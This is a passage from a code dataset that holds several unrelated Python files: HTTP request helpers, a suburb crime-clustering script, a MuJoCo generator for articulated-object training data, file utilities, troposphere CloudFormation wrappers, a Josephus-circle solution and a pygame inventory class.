{c}!\".format(u=url, c=e.code))\n continue\n except error.URLError as e:\n logger.error(\"post request failed, url: {u}, code: {c}!\".format(u=url, c=e.reason))\n continue\n except Exception as e:\n logger.error(\"post request failed, url: {u}, {e} !\".format(u=url, e=repr(e)))\n continue\n else:\n raise DoPostError('_do_post error,request failed !')\n\n\ndef _do_get(url, **kwargs):\n \"\"\"\n request get method\n \"\"\"\n\n value = None\n if kwargs:\n value_list = ['{0}={1}'.format(k, v) for k, v in kwargs.items()]\n value = '&'.join(value_list)\n\n url = url + value if value else url\n req = request.Request(url=url)\n\n for i in range(3):\n _timeout = 3 * i + 3\n try:\n res = request.urlopen(req, timeout=_timeout)\n if res:\n return json.loads(str(res.read(), encoding='utf-8'))\n else:\n continue\n except error.HTTPError as e:\n logger.error(\"get request failed {0}, {1}!\".format(url, e.code))\n continue\n except error.URLError as e:\n logger.error(\"get request failed {0}, {1}!\".format(url, e.reason))\n continue\n except Exception as e:\n logger.error(\"get request failed {0}, {1} !\".format(url, repr(e)))\n continue\n else:\n raise DoGetError('_do_get error,request failed !')\n","sub_path":"utils/utils_tools.py","file_name":"utils_tools.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"21933382","text":"__author__ = 'viva'\n\n__author__ = 'viva'\nimport parser\nfrom sklearn import manifold\nfrom sklearn.cluster import KMeans\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\n# crime features analysis\n\nself_defined = ['Personal income <$400/week, %', 'Mental Health',\n 'Did not complete year 12, %', 'Unemployed, %',\n '% dwellings which are public housing',\n '2012 ERP age 15-24, %', '2012 ERP age 25-44, %']\n\nfeatures = parser.get_features()\n\nsuburbs = []\nfor item in features:\n suburbs.append(item)\n\n\ndef suburb_crime():\n suburb_crime_features_raw = {}\n suburb_crime_values = {}\n\n for item in features:\n suburb_crime_features_raw[item] = features[item]\n\n for key in suburb_crime_features_raw:\n\n for key1, value1 in suburb_crime_features_raw[key].iteritems():\n if key1 in self_defined:\n # if '% change, 2007-2012' in key1:\n try:\n suburb_crime_values[key].append(float(value1))\n except ValueError:\n try:\n suburb_crime_values[key].append(0.0)\n except KeyError:\n suburb_crime_values[key] = [0.0]\n except KeyError:\n try:\n suburb_crime_values[key] = [float(value1)]\n except ValueError:\n suburb_crime_values[key] = [0.0]\n\n return suburb_crime_values\n\n\nif __name__ == \"__main__\":\n coords = manifold.MDS(n_components=2).fit([value for key, value in suburb_crime().iteritems()]).embedding_\n\n n_cluster = 4\n k_means = KMeans(init='k-means++', n_clusters=n_cluster, n_init=10)\n k_means.fit(coords)\n k_means_labels = k_means.labels_\n k_means_cluster_centers = k_means.cluster_centers_\n k_means_labels_unique = np.unique(k_means_labels)\n\n colors = ['#4EACC5', '#FF9C34', '#4E9A06', \"#F0F8FF\", \"#800000\", \"#D2691E\", \"#FFFACD\", \"#FA8072\", \"#D2691E\"]\n\n for k, col in zip(range(n_cluster), colors):\n my_members = k_means_labels == k\n cluster_center = k_means_cluster_centers[k]\n plt.plot(coords[my_members, 0], coords[my_members, 1], 'w',\n markerfacecolor=col, marker='o', markersize=20)\n plt.plot(cluster_center[0], cluster_center[1], 'x', markerfacecolor=col,\n markeredgecolor='red', markersize=20, markeredgewidth=2)\n\n # plt.figure(1)\n # plt.scatter(coords[:, 0], coords[:, 1], alpha=0.5)\n\n for label, x, y in zip(suburbs, coords[:, 0], coords[:, 1]):\n plt.annotate(\n label,\n xy=(x, y), xytext=(-20, 20),\n textcoords='offset points', ha='right', va='bottom',\n bbox=dict(boxstyle='round,pad=0.5', fc='white', alpha=0.5),\n arrowprops=dict(arrowstyle='->', connectionstyle='arc3,rad=0'))\n\n plt.show()\n","sub_path":"project2/part_B/crime.py","file_name":"crime.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524551809","text":"import pickle\nimport time\nimport os\nimport csv\nimport copy\n\nimport cv2\nimport h5py\nimport pyro\nimport pyro.distributions as dist\nimport torch\nimport numpy as np\nfrom tqdm import tqdm\nimport transforms3d as tf3d\nfrom mujoco_py import functions\n\nfrom mujoco_py import load_model_from_path, MjSim, MjViewer\nfrom mujoco_py.modder import TextureModder\n\nfrom SyntheticArticulatedData.generation.mujocoCabinetParts import build_cabinet, sample_cabinet\nfrom SyntheticArticulatedData.generation.mujocoDrawerParts import build_drawer, sample_drawers\nfrom SyntheticArticulatedData.generation.mujocoMicrowaveParts import build_microwave, sample_microwave\nfrom SyntheticArticulatedData.generation.mujocoToasterOvenParts import build_toaster, sample_toaster\nfrom SyntheticArticulatedData.generation.mujocoDoubleCabinetParts import build_cabinet2, sample_cabinet2, \\\n set_two_door_control\nfrom SyntheticArticulatedData.generation.mujocoRefrigeratorParts import build_refrigerator, sample_refrigerator\nfrom SyntheticArticulatedData.generation.utils import *\nimport SyntheticArticulatedData.generation.calibrations as calibrations\n\n\ndef white_bg(img):\n mask = 1 - (img > 0)\n img_cp = copy.deepcopy(img)\n img_cp[mask.all(axis=2)] = [255, 255, 255]\n return img_cp\n\n\ndef buffer_to_real(z, zfar, znear):\n return 2 * zfar * znear / (zfar + znear - (zfar - znear) * (2 * z - 1))\n\n\ndef vertical_flip(img):\n return np.flip(img, axis=0)\n\n\ndef should_use_image_hacky(img, bnds=2):\n mask = img > 0\n img_w_bnds = cv2.rectangle(np.zeros((img.shape[0], img.shape[1]), np.uint8), (0, 0),\n (img.shape[1], img.shape[0]), 255, thickness=bnds) > 0\n if np.logical_and(mask, img_w_bnds).sum() > 20:\n return False\n else:\n return True\n\n\ndef should_use_image(img, bigger_image):\n n_obj = (img > 0).sum()\n n_obj_big = (bigger_image > 0).sum()\n if n_obj < 50 or (n_obj / n_obj_big) < 0.40: # Fraction of pixels within smaller image is small\n return False\n else:\n return True\n\n\nclass SceneGenerator():\n def __init__(self, root_dir='bull/test_cabinets/solo', masked=False, debug_flag=False):\n '''\n Class for generating simulated articulated object dataset.\n params:\n - root_dir: save in this directory\n - start_idx: index of first image saved - useful in threading context\n - depth_data: np array of depth images\n - masked: should the background of depth images be 0s or 1s?\n '''\n self.scenes = []\n self.savedir = root_dir\n self.masked = masked\n self.img_idx = 0\n self.depth_data = []\n self.debugging = debug_flag\n print(root_dir)\n\n def write_urdf(self, filename, xml):\n with open(filename, \"w\") as text_file:\n text_file.write(xml)\n\n def sample_obj(self, obj_type, mean_flag, left_only, cute_flag=False):\n if obj_type == 'microwave':\n l, w, h, t, left, mass = sample_microwave(mean_flag)\n if mean_flag:\n obj = build_microwave(l, w, h, t, left,\n set_pose=[1.0, 0.0, -0.15],\n set_rot=[0.0, 0.0, 0.0, 1.0])\n elif cute_flag:\n base_xyz, base_angle = sample_pose()\n base_quat = angle_to_quat(base_angle)\n obj = build_microwave(l, w, h, t, left,\n set_pose=[1.0, 0.0, -0.15],\n set_rot=base_quat)\n else:\n obj = build_microwave(l, w, h, t, left)\n\n elif obj_type == 'drawer':\n l, w, h, t, left, mass = sample_drawers(mean_flag)\n if mean_flag:\n obj = build_drawer(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.4],\n set_rot=[0.0, 0.0, 0.0, 1.0])\n elif cute_flag:\n base_xyz, base_angle = sample_pose()\n base_quat = angle_to_quat(base_angle)\n obj = build_drawer(l, w, h, t, left,\n set_pose=[1.2, 0.0, -0.15],\n set_rot=base_quat)\n else:\n obj = build_drawer(l, w, h, t, left)\n\n elif obj_type == 'toaster':\n l, w, h, t, left, mass = sample_toaster(mean_flag)\n if mean_flag:\n obj = build_toaster(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.3],\n set_rot=[0.0, 0.0, 0.0, 1.0])\n elif cute_flag:\n base_xyz, base_angle = sample_pose()\n base_quat = angle_to_quat(base_angle)\n obj = build_toaster(l, w, h, t, left,\n set_pose=[1.0, 0.0, -0.15],\n set_rot=base_quat)\n else:\n obj = build_toaster(l, w, h, t, left)\n\n elif obj_type == 'cabinet':\n l, w, h, t, left, mass = sample_cabinet(mean_flag)\n if left_only:\n left = True\n else:\n # left = False\n left = np.random.choice([True, False])\n if mean_flag:\n if left_only:\n left = True\n else:\n left = False\n obj = build_cabinet(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.3],\n set_rot=[0.0, 0.0, 0.0, 1.0])\n elif cute_flag:\n base_xyz, base_angle = sample_pose()\n base_quat = angle_to_quat(base_angle)\n obj = build_cabinet(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.15],\n set_rot=base_quat)\n else:\n # left = np.random.choice([True, False])\n obj = build_cabinet(l, w, h, t, left)\n\n elif obj_type == 'cabinet2':\n l, w, h, t, left, mass = sample_cabinet2(mean_flag)\n if mean_flag:\n obj = build_cabinet2(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.3],\n set_rot=[0.0, 0.0, 0.0, 1.0])\n elif cute_flag:\n base_xyz, base_angle = sample_pose()\n base_quat = angle_to_quat(base_angle)\n obj = build_cabinet2(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.15],\n set_rot=base_quat)\n else:\n obj = build_cabinet2(l, w, h, t, left)\n\n elif obj_type == 'refrigerator':\n l, w, h, t, left, mass = sample_refrigerator(mean_flag)\n if mean_flag:\n\n obj = build_refrigerator(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.3],\n set_rot=[0.0, 0.0, 0.0, 1.0])\n elif cute_flag:\n base_xyz, base_angle = sample_pose()\n base_quat = angle_to_quat(base_angle)\n obj = build_refrigerator(l, w, h, t, left,\n set_pose=[2.5, 0.0, -0.75],\n set_rot=base_quat)\n\n else:\n obj = build_refrigerator(l, w, h, t, left)\n\n else:\n raise Exception('uh oh, object not implemented!')\n return obj\n\n def generate_scenes(self, N, objtype, write_csv=True, save_imgs=True, mean_flag=False, left_only=False,\n cute_flag=False):\n fname = os.path.join(self.savedir, 'params.csv')\n h5fname = os.path.join(self.savedir, 'complete_data.hdf5')\n self.img_idx = 0\n i = 0\n with h5py.File(h5fname, 'a') as h5File:\n # for i in tqdm(range(N)):\n pbar = tqdm(total=N)\n str_type = h5py.string_dtype()\n while i < N:\n obj = self.sample_obj(objtype, mean_flag, left_only, cute_flag=cute_flag)\n xml = obj.xml\n fname = os.path.join(self.savedir, 'scene' + str(i).zfill(6) + '.xml')\n grp = h5File.create_group(\"obj_\" + str(i).zfill(6))\n self.write_urdf(fname, xml)\n res = self.take_images(fname, obj, grp, use_force=False)\n if not res:\n del h5File[\"obj_\" + str(i).zfill(6)]\n else:\n i += 1\n pbar.update(1)\n self.scenes.append(fname)\n ds = grp.create_dataset('mujoco_scene_xml', shape=(1,), dtype=str_type)\n ds[:] = xml\n return\n\n def take_images(self, filename, obj, h5group, use_force=False):\n model = load_model_from_path(filename)\n sim = MjSim(model)\n modder = TextureModder(sim)\n # viewer=MjViewer(sim) # this fucking line has caused me (Ben) so much pain.\n\n embedding = np.append(obj.type, obj.geom.reshape(-1))\n if obj.type == 4 or obj.type == 5:\n # MULTI CABINET: get double the params.\n axis1, door1 = transform_param(obj.params[0][0], obj.params[0][1], obj)\n axis2, door2 = transform_param(obj.params[1][0], obj.params[1][1], obj)\n axes = np.append(axis1, axis2)\n doors = np.append(door1, door2)\n params = np.append(axes, doors)\n set_two_door_control(sim, 'cabinet2' if obj.type == 4 else 'refrigerator')\n n_qpos_variables = 2\n\n else:\n handle_name = 'handle_link'\n joint_body_name = 'cabinet_left_hinge'\n n_qpos_variables = 1\n if obj.type == 1:\n sim.data.ctrl[0] = 0.05\n handle_name = 'knob'\n joint_body_name = 'drawer'\n elif obj.geom[3] == 1:\n sim.data.ctrl[0] = -0.2\n else:\n sim.data.ctrl[0] = 0.2\n\n params = get_cam_relative_params2(obj) # if 1DoF, params is length 10. If 2DoF, params is length 20.\n\n embedding_and_params = np.concatenate((embedding, params, obj.pose, obj.rotation))\n # object_reference_frame_in_world = np.concatenate((obj.pose, obj.rotation))\n\n # print('nqpos', n_qpos_variables)\n # print(self.img_idx, obj.pose)\n # print(embedding_and_params.shape)\n t = 0\n\n #########################\n IMG_WIDTH = calibrations.sim_width\n IMG_HEIGHT = calibrations.sim_height\n #########################\n\n force = np.array([0., 0., 0.])\n if use_force:\n # Generating Data by applying random Cartesian forces\n sim.data.ctrl[0] = 0.\n force = np.array([-1., 0., 0.])\n torque = np.array([0., 0., 0.])\n pt = sim.data.get_body_xpos(handle_name)\n bodyid = sim.model.body_name2id(handle_name)\n\n q_vals = []\n qdot_vals = []\n qddot_vals = []\n torque_vals = []\n applied_forces = []\n moving_frame_xpos_world = []\n moving_frame_xpos_ref_frame = []\n depth_imgs = torch.Tensor()\n\n img_counter = 0\n\n while t < 4000:\n if use_force:\n sim.data.qfrc_applied.fill(0.) # Have to clear previous data\n functions.mj_applyFT(model, sim.data, force, torque, pt, bodyid, sim.data.qfrc_applied)\n sim.forward()\n sim.step()\n\n \"\"\" Recording data for linear regression at a different frequency than images \"\"\"\n # if t % 10 == 0:\n if t % 250 == 0:\n img, depth = sim.render(IMG_WIDTH, IMG_HEIGHT, camera_name='external_camera_0', depth=True)\n depth = vertical_flip(depth)\n real_depth = buffer_to_real(depth, 12.0, 0.1)\n norm_depth = real_depth / 12.0\n\n # Checking if sampled object is within the image frame or not\n bigger_img = sim.render(int(1.5*IMG_WIDTH), int(1.5*IMG_HEIGHT),\n camera_name='external_camera_0', depth=False)\n if not should_use_image(img, bigger_img):\n self.img_idx -= img_counter\n return False\n\n if self.masked:\n # remove background\n mask = norm_depth > 0.99\n norm_depth = (1 - mask) * norm_depth\n\n if self.debugging:\n # save image to disk for visualization\n # img = cv2.resize(img, (IMG_WIDTH,IMG_HEIGHT))\n\n img = vertical_flip(img)\n img = white_bg(img)\n integer_depth = norm_depth * 255\n\n imgfname = os.path.join(self.savedir, 'img' + str(self.img_idx).zfill(6) + '.png')\n depth_imgfname = os.path.join(self.savedir, 'depth_img' + str(self.img_idx).zfill(6) + '.png')\n cv2.imwrite(imgfname, img)\n cv2.imwrite(depth_imgfname, integer_depth)\n\n # if IMG_WIDTH != 192 or IMG_HEIGHT != 108:\n # depth = cv2.resize(norm_depth, (192,108))\n\n depthfname = os.path.join(self.savedir, 'depth' + str(self.img_idx).zfill(6) + '.pt')\n torch.save(torch.tensor(norm_depth.copy()), depthfname)\n\n depth_imgs = torch.cat((depth_imgs, torch.tensor(norm_depth.copy()).float().unsqueeze_(dim=0)))\n\n q_vals.append(copy.copy(sim.data.qpos[:n_qpos_variables]))\n qdot_vals.append(copy.copy(sim.data.qvel[:n_qpos_variables]))\n qddot_vals.append(copy.copy(sim.data.qacc[:n_qpos_variables]))\n torque_vals.append(copy.copy(sim.data.qfrc_applied[:n_qpos_variables]))\n applied_forces.append(copy.copy(force))\n x_pos = np.append(sim.data.get_body_xpos(handle_name), sim.data.get_body_xquat(handle_name))\n moving_frame_xpos_world.append(copy.copy(x_pos)) # quat comes in wxyz form\n joint_frame_in_world = np.append(sim.data.get_body_xpos(joint_body_name), obj.rotation)\n # moving_frame_xpos_ref_frame.append(copy.copy(\n # change_frames(frame_B_wrt_A=joint_frame_in_world, pose_wrt_A=x_pos)))\n\n self.img_idx += 1\n img_counter += 1\n\n t += 1\n\n h5group.create_dataset('embedding_and_params', data=embedding_and_params)\n h5group.create_dataset('joint_frame_in_world', data=joint_frame_in_world)\n h5group.create_dataset('moving_frame_in_world', data=np.array(moving_frame_xpos_world))\n # h5group.create_dataset('moving_frame_in_ref_frame', data=np.array(moving_frame_xpos_ref_frame))\n h5group.create_dataset('depth_imgs', data=depth_imgs)\n\n h5group.create_dataset('q', data=np.array(q_vals))\n h5group.create_dataset('qdot', data=np.array(qdot_vals))\n h5group.create_dataset('qddot', data=np.array(qddot_vals))\n h5group.create_dataset('torques', data=np.array(torque_vals))\n h5group.create_dataset('forces', data=np.array(applied_forces))\n\n return True\n\n\n# shapes and stuff\n# if 1DoF, params is length 10. If 2DoF, params is length 20.\n# embedding is length 5: type, l, w, h, left\n# pose is length 3\n# rotation is length 4\n# finally, q is length 1 or 2.\n# thus, for generating shape data:\n# 1DoF: q is position 21\n# 2DoF: q is position 31\n\n# Object IDs\n# 0 - microwave\n# 1 - drawer\n# 2 - cabinet\n# 3 - toaster\n# 4 - double cabinet\n# 5 - refrigerator\n","sub_path":"generation/generator_v2.py","file_name":"generator_v2.py","file_ext":"py","file_size_in_byte":15676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360644229","text":"\"\"\"\nThe following module contains functions that help in file and directory\noperations.\n\"\"\"\nimport os\nimport pdb\nimport glob\nimport pathlib\nimport warnings\nimport pandas as pd\n\ndef check_if_file_exists(file_path):\n \"\"\"\n If file does not exists it raises an exception\n\n Parameters\n ----------\n file_path : str\n Full path to file\n \"\"\"\n if not os.path.isfile(file_path):\n raise Exception(f\"The file does not exist,\\n\\t{file_path}\")\n\ndef check_if_dir_exists(directory_path):\n \"\"\"\n If file does not exists it raises an exception\n\n Parameters\n ----------\n directory_path : str\n Full path of directory\n \"\"\"\n if not os.path.isdir(directory_path):\n raise Exception(f\"The directory does not exist,\\n\\t{directory_path}\")\n\n\ndef get_file_list(loc, ext):\n \"\"\" The following function returns all the files ina directory\n having an extension. This does not do recursive search.\n\n Parameters\n ----------\n loc : str\n File location\n ext : str\n File extension\n \"\"\"\n return glob.glob(f\"{loc}/*.{ext}\")\n\ndef get_files_with_kws(loc, kws):\n \"\"\"\n Lists full paths of files having certian keywords in their names\n\n Parameters\n ----------\n\n loc : str\n Path to the root directory containing files.\n kws : list of str\n List of key words the files have\n \"\"\"\n # Check if directory is valid\n if not (os.path.exists(loc)):\n raise Exception(f\"The path {loc} is not valid.\")\n\n # create a list using comma separated values\n kw_lst_csv = []\n for idx, litem in enumerate(kws):\n litem_split = litem.split(\",\")\n if len(litem_split) > 1:\n kw_lst_csv = kw_lst_csv + litem_split\n else:\n kw_lst_csv.append(litem_split[0])\n\n # Loop through each file\n files = []\n for r, d, f in os.walk(loc):\n for file in f:\n # Break comma separated values\n # Check if current file contains all of the key words\n is_valid_file = all(kw in file for kw in kw_lst_csv)\n if is_valid_file:\n files.append(os.path.join(r, file))\n\n # return\n return files\n\n\ndef get_file_list_recursive(loc, ext):\n \"\"\" The following function returns all the files ina directory\n having an extension. This does not do recursive search.\n\n Parameters\n ----------\n loc : str\n File location\n ext : str\n File extension\n \"\"\"\n return glob.glob(f\"{loc}/**/*.{ext}\", recursive=True)\n\n\ndef get_loc_name_ext(full_path):\n \"\"\"\n Given a full path this function will returns a tuple having\n following information,\n full directory path, file name, file extension\n \"\"\"\n check_if_file_exists(full_path)\n\n file_loc = os.path.dirname(full_path)\n fname_with_ext = os.path.basename(full_path)\n fname, ext = os.path.splitext(fname_with_ext)\n\n ext = ext[1:]\n file_loc = os.path.abspath(file_loc)\n\n return file_loc, fname, ext\n\n\ndef recursive_mkdir(dir_path):\n \"\"\" Create directory recursively.\n \"\"\"\n if not os.path.isdir(dir_path):\n path = pathlib.Path(dir_path)\n path.mkdir(parents=True)\n print(f\"USER_INFO: Creating directory\\n\\t{dir_path}\")\n\ndef load_all_activity_labels( flist):\n \"\"\" Loads all activity labels into one dataframe.\n\n Parameters\n ----------\n flist: list of str\n List of csv file paths having activity labels.\n \"\"\"\n dflst = []\n for f in flist:\n dflst += [pd.read_csv(f)]\n\n return pd.concat(dflst, ignore_index=True)\n","sub_path":"harp/fdops.py","file_name":"fdops.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"225728010","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/sanhehu/Documents/GitHub/troposphere_mate-project/troposphere_mate/servicediscovery.py\n# Compiled at: 2020-02-12 18:15:55\n# Size of source mod 2**32: 6994 bytes\n\"\"\"\nThis code is auto generated from troposphere_mate.code_generator.__init__.py scripts.\n\"\"\"\nimport sys\nif sys.version_info.major >= 3:\n if sys.version_info.minor >= 5:\n from typing import Union, List, Any\nimport troposphere.servicediscovery\nfrom troposphere.servicediscovery import DnsConfig as _DnsConfig, DnsRecord as _DnsRecord, HealthCheckConfig as _HealthCheckConfig, HealthCheckCustomConfig as _HealthCheckCustomConfig\nfrom troposphere import Template, AWSHelperFn\nfrom troposphere_mate.core.mate import preprocess_init_kwargs, Mixin\nfrom troposphere_mate.core.sentiel import REQUIRED, NOTHING\n\nclass Instance(troposphere.servicediscovery.Instance, Mixin):\n\n def __init__(self, title, template=None, validation=True, InstanceAttributes=REQUIRED, ServiceId=REQUIRED, InstanceId=NOTHING, **kwargs):\n processed_kwargs = preprocess_init_kwargs(title=title, \n template=template, \n validation=validation, \n InstanceAttributes=InstanceAttributes, \n ServiceId=ServiceId, \n InstanceId=InstanceId, **kwargs)\n (super(Instance, self).__init__)(**processed_kwargs)\n\n\nclass PrivateDnsNamespace(troposphere.servicediscovery.PrivateDnsNamespace, Mixin):\n\n def __init__(self, title, template=None, validation=True, Name=REQUIRED, Vpc=REQUIRED, Description=NOTHING, **kwargs):\n processed_kwargs = preprocess_init_kwargs(title=title, \n template=template, \n validation=validation, \n Name=Name, \n Vpc=Vpc, \n Description=Description, **kwargs)\n (super(PrivateDnsNamespace, self).__init__)(**processed_kwargs)\n\n\nclass PublicDnsNamespace(troposphere.servicediscovery.PublicDnsNamespace, Mixin):\n\n def __init__(self, title, template=None, validation=True, Name=REQUIRED, Description=NOTHING, **kwargs):\n processed_kwargs = preprocess_init_kwargs(title=title, \n template=template, \n validation=validation, \n Name=Name, \n Description=Description, **kwargs)\n (super(PublicDnsNamespace, self).__init__)(**processed_kwargs)\n\n\nclass HealthCheckConfig(troposphere.servicediscovery.HealthCheckConfig, Mixin):\n\n def __init__(self, title=None, Type=REQUIRED, FailureThreshold=NOTHING, ResourcePath=NOTHING, **kwargs):\n processed_kwargs = preprocess_init_kwargs(title=title, \n Type=Type, \n FailureThreshold=FailureThreshold, \n ResourcePath=ResourcePath, **kwargs)\n (super(HealthCheckConfig, self).__init__)(**processed_kwargs)\n\n\nclass HealthCheckCustomConfig(troposphere.servicediscovery.HealthCheckCustomConfig, Mixin):\n\n def __init__(self, title=None, FailureThreshold=REQUIRED, **kwargs):\n processed_kwargs = preprocess_init_kwargs(title=title, \n FailureThreshold=FailureThreshold, **kwargs)\n (super(HealthCheckCustomConfig, self).__init__)(**processed_kwargs)\n\n\nclass DnsRecord(troposphere.servicediscovery.DnsRecord, Mixin):\n\n def __init__(self, title=None, TTL=REQUIRED, Type=REQUIRED, **kwargs):\n processed_kwargs = preprocess_init_kwargs(title=title, \n TTL=TTL, \n Type=Type, **kwargs)\n (super(DnsRecord, self).__init__)(**processed_kwargs)\n\n\nclass DnsConfig(troposphere.servicediscovery.DnsConfig, Mixin):\n\n def __init__(self, title=None, DnsRecords=REQUIRED, NamespaceId=REQUIRED, RoutingPolicy=NOTHING, **kwargs):\n processed_kwargs = preprocess_init_kwargs(title=title, \n DnsRecords=DnsRecords, \n NamespaceId=NamespaceId, \n RoutingPolicy=RoutingPolicy, **kwargs)\n (super(DnsConfig, self).__init__)(**processed_kwargs)\n\n\nclass Service(troposphere.servicediscovery.Service, Mixin):\n\n def __init__(self, title, template=None, validation=True, Description=NOTHING, DnsConfig=NOTHING, HealthCheckConfig=NOTHING, HealthCheckCustomConfig=NOTHING, Name=NOTHING, NamespaceId=NOTHING, **kwargs):\n processed_kwargs = preprocess_init_kwargs(title=title, \n template=template, \n validation=validation, \n Description=Description, \n DnsConfig=DnsConfig, \n HealthCheckConfig=HealthCheckConfig, \n HealthCheckCustomConfig=HealthCheckCustomConfig, \n Name=Name, \n NamespaceId=NamespaceId, **kwargs)\n (super(Service, self).__init__)(**processed_kwargs)\n\n\nclass HttpNamespace(troposphere.servicediscovery.HttpNamespace, Mixin):\n\n def __init__(self, title, template=None, validation=True, Name=REQUIRED, Description=NOTHING, **kwargs):\n processed_kwargs = preprocess_init_kwargs(title=title, \n template=template, \n validation=validation, \n Name=Name, \n Description=Description, **kwargs)\n (super(HttpNamespace, self).__init__)(**processed_kwargs)","sub_path":"pycfiles/troposphere_mate-0.0.14-py2.py3-none-any/servicediscovery.cpython-36.py","file_name":"servicediscovery.cpython-36.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"486977783","text":"\"\"\"\n题目描述\n每年六一儿童节,牛客都会准备一些小礼物去看望孤儿院的小朋友,今年亦是如此。HF作为牛客的资深元老,自然也准备了一些小游戏。其中,有个\n游戏是这样的:首先,让小朋友们围成一个大圈。然后,他随机指定一个数m,让编号为0的小朋友开始报数。每次喊到m-1的那个小朋友要出列唱首\n歌,然后可以在礼品箱中任意的挑选礼物,并且不再回到圈中,从他的下一个小朋友开始,继续0...m-1报数....这样下去....直到剩下最后一个\n小朋友,可以不用表演,并且拿到牛客名贵的“名侦探柯南”典藏版(名额有限哦!!^_^)。请你试着想下,哪个小朋友会得到这份礼品呢?(注:小\n朋友的编号是从0到n-1)\n\"\"\"\n\n\n# -*- coding:utf-8 -*-\nclass LNode:\n def __init__(self, item=None):\n self.val = item\n self.next = None\n\n\nclass Solution:\n def LastRemaining_Solution(self, n, m):\n # write code here\n if n == 0 or m == 0:\n return -1\n head = LNode()\n cur = head\n for i in range(n):\n cur.next = LNode(i)\n cur = cur.next\n cur.next = head.next\n\n cur = head.next\n while cur != cur.next:\n for i in range(m - 1):\n pre = cur\n cur = cur.next\n if cur != head.next:\n pre.next = cur.next\n cur = cur.next\n else:\n head.next = cur.next\n pre.next = cur.next\n cur = cur.next\n return cur.val","sub_path":"剑指office/孩子们的游戏(圆圈中最后剩下的数).py","file_name":"孩子们的游戏(圆圈中最后剩下的数).py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"423669291","text":"from ItemIds import ids\r\nimport pygame\r\n\r\npygame.init()\r\n\r\n\r\nclass Inventory:\r\n def __init__(self):\r\n self.tiles = [Tile(10, 20), Tile(75, 20), Tile(150, 20), Tile(215, 20), Tile(280, 20), Tile(345, 20)]\r\n self.open = False\r\n self.font = pygame.font.SysFont(\"calibri\", 20)\r\n self.pickeditem = None\r\n self.pickedamount = None\r\n self.pressed = False\r\n self.selectednum = 0\r\n self.selectedslot = None\r\n self.selecteditem = None\r\n\r\n def draw(self, screen):\r\n if self.open:\r\n screen.fill((0, 0, 0))\r\n for slot in self.tiles:\r\n slot.draw(screen)\r\n screen.blit(self.font.render(\"hands\", False, (255, 255, 255)), (55, 2))\r\n screen.blit(self.font.render(\"pockets\", False, (255, 255, 255)), (250, 2))\r\n if self.pickeditem is not None:\r\n screen.blit(ids[self.pickeditem],\r\n (pygame.mouse.get_pos()[0] - 32, pygame.mouse.get_pos()[1] - 32))\r\n else:\r\n # width of 420 height of 85\r\n pygame.draw.rect(screen, (0, 0, 0), (190, 415, 420, 85))\r\n for slot in self.tiles:\r\n slot.hotbar_draw(screen, (201 + self.tiles.index(slot) * 65, 426))\r\n if (slot.xpos, slot.ypos) == self.selectedslot:\r\n pygame.draw.rect(screen, (0, 0, 0), (203 + self.tiles.index(slot) * 65, 428, 59, 59), 1)\r\n\r\n def update(self, screen, events):\r\n self.selectedslot = self.tiles[self.selectednum].xpos, self.tiles[self.selectednum].ypos\r\n for slot in self.tiles:\r\n if (slot.xpos, slot.ypos) == self.selectedslot:\r\n self.selecteditem = slot.item\r\n mouse = pygame.mouse.get_pressed()\r\n self.draw(screen)\r\n if self.open:\r\n mouse_slot = self.mouse_on_slot()\r\n if mouse[0]:\r\n if not self.pressed:\r\n self.pressed = True\r\n if self.pickeditem is not None:\r\n self.placeitem(mouse_slot)\r\n else:\r\n self.pickitem(mouse_slot)\r\n if not mouse[0]:\r\n if self.pressed:\r\n self.pressed = False\r\n for event in events:\r\n if event.type == pygame.KEYDOWN:\r\n if event.key in [pygame.K_1, pygame.K_2, pygame.K_3, pygame.K_4, pygame.K_5, pygame.K_6]:\r\n self.selectednum = int(event.unicode) - 1\r\n elif event.key == pygame.K_e:\r\n self.open = not self.open\r\n\r\n def mouse_on_slot(self):\r\n mouse = pygame.mouse.get_pos()\r\n for slot in self.tiles:\r\n if slot.rect.collidepoint(mouse[0], mouse[1]):\r\n return slot.xpos, slot.ypos\r\n\r\n def pickitem(self, slot):\r\n for tile in self.tiles:\r\n if (tile.xpos, tile.ypos) == slot:\r\n self.pickeditem, self.pickedamount = tile.item, tile.amount\r\n tile.item, tile.amount = None, None\r\n\r\n def placeitem(self, slot):\r\n for tile in self.tiles:\r\n if (tile.xpos, tile.ypos) == slot:\r\n if tile.item == self.pickeditem:\r\n self.pickedamount -= 1\r\n tile.amount += 1\r\n if self.pickedamount == 0:\r\n self.pickeditem = None\r\n elif tile.item is None:\r\n tile.item, tile.amount = self.pickeditem, self.pickedamount\r\n self.pickeditem, self.pickedamount = None, None\r\n elif tile.item != self.pickeditem:\r\n item, amount = tile.item, tile.amount\r\n tile.item, tile.amount = self.pickeditem, self.pickedamount\r\n self.pickeditem, self.pickedamount = item, amount\r\n\r\n def additem(self, item, amount):\r\n for slot in self.tiles:\r\n if slot.item == item:\r\n slot.amount += amount\r\n item, amount = None, None\r\n for slot in self.tiles:\r\n if slot.item is None:\r\n slot.item, slot.amount = item, amount\r\n item, amount = None, None\r\n\r\n def space_for(self, item):\r\n for slot in self.tiles:\r\n if 